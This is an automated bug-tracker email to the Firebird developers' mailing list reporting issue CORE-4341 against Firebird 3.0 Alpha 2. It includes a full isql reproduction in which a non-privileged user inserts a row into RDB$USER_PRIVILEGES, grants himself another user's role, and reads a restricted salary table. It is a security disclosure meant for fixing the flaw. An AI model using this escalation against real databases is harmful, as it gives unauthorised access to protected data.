non-privileged user can grant other's role to himself
-----------------------------------------------------
Key: CORE-4341
URL: http://tracker.firebirdsql.org/browse/CORE-4341
Project: Firebird Core
Issue Type: Bug
Components: Security
Affects Versions: 3.0 Alpha 2
Reporter: Pavel Zotov
SQL> create database 'sec.fdb';
SQL> drop user boss; -- if exists...
SQL> drop user zero; -- if exists...
SQL> create user boss password 'boss'; -- this user CAN access to some data
SQL> create user zero password 'zero'; -- this is non-privileged user
SQL> create role rboss;
SQL> create role rzero;
SQL> grant rboss to boss;
SQL> grant rzero to zero;
SQL> create table salary(id int, s int);
SQL> insert into salary values(1, 1000);
SQL> commit;
SQL> grant all on salary to rboss; -- we grant access only to this role; NOT to
role 'RZERO' !
SQL> commit;
SQL> quit;
----------------
-- now check that user BOSS can view and edit table SALARY via role RBOSS:
$ /opt/fb30trnk/bin/isql /var/db/fb30/sec.fdb -user boss -pas boss -role RBOSS
Database: /var/db/fb30/sec.fdb, User: boss, Role: RBOSS
SQL> set list on;
SQL> select current_user,current_role from rdb$database;
USER BOSS
ROLE RBOSS
SQL> select * from salary;
ID 1
S 1000
SQL> update salary set s=2000 where id=1;
SQL> insert into salary values(2,2222);
SQL> commit;
SQL> select * from salary;
ID 1
S 2000
ID 2
S 2222
-- that's OK.
SQL> exit;
-------------------------------------
-- now connect as non-privileged user 'ZERO' (specifying his role is optional;
result is the same):
$ /opt/fb30trnk/bin/isql /var/db/fb30/sec.fdb -user zero -pas zero
Database: /var/db/fb30/sec.fdb, User: zero
SQL> show role;
RBOSS RZERO
SQL> show table;
SALARY
SQL> select * from salary;
Statement failed, SQLSTATE = 28000
no permission for SELECT access to TABLE SALARY -- OK, it should be such
-- and now we insert new record in system table RDB$USER_PRIVILEGES (we CAN do
this!)
-- NB: we can add row either NOT specifying value for RDB$GRANTOR field or set
it = 'ZERO' (i.e. current user):
SQL> insert into
rdb$user_privileges(rdb$user,rdb$privilege,rdb$relation_name,rdb$user_type,rdb$object_type)
CON> values( 'ZERO', 'M', 'RBOSS', 8, 13 ); -- PASSED! Why ??
SQL> commit;
SQL> connect '/var/db/fb30/sec.fdb' user zero password 'zero' role 'RBOSS';
Database: '/var/db/fb30/sec.fdb', User: zero, Role: RBOSS
SQL> set list on;
SQL> select current_user,current_role from rdb$database;
USER ZERO -- i'm connect as non-privileged user...
ROLE RBOSS -- ...but i HAVE grated to role of the
BOSS (and I did it myself)
-- final check:
SQL> select * from salary;
ID 1
S 2000
ID 2
S 2222
SQL> show version;
ISQL Version: LI-T3.0.0.30876 Firebird 3.0 Alpha 2
Server version:
Firebird/Linux/AMD/Intel/x64 (access method), version "LI-T3.0.0.30876 Firebird
3.0 Alpha 2"
on disk structure version 12.0
--
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
http://tracker.firebirdsql.org/secure/Administrators.jspa
-
For more information on JIRA, see: http://www.atlassian.com/software/jira
------------------------------------------------------------------------------
Android apps run on BlackBerry 10
Introducing the new BlackBerry 10.2.1 Runtime for Android apps.
Now with support for Jelly Bean, Bluetooth, Mapview and more.
Get your Android app in front of a whole new audience. Start now.
http://pubads.g.doubleclick.net/gampad/clk?id=124407151&iu=/4140/ostg.clktrk
Firebird-Devel mailing list, web interface at
https://lists.sourceforge.net/lists/listinfo/firebird-devel
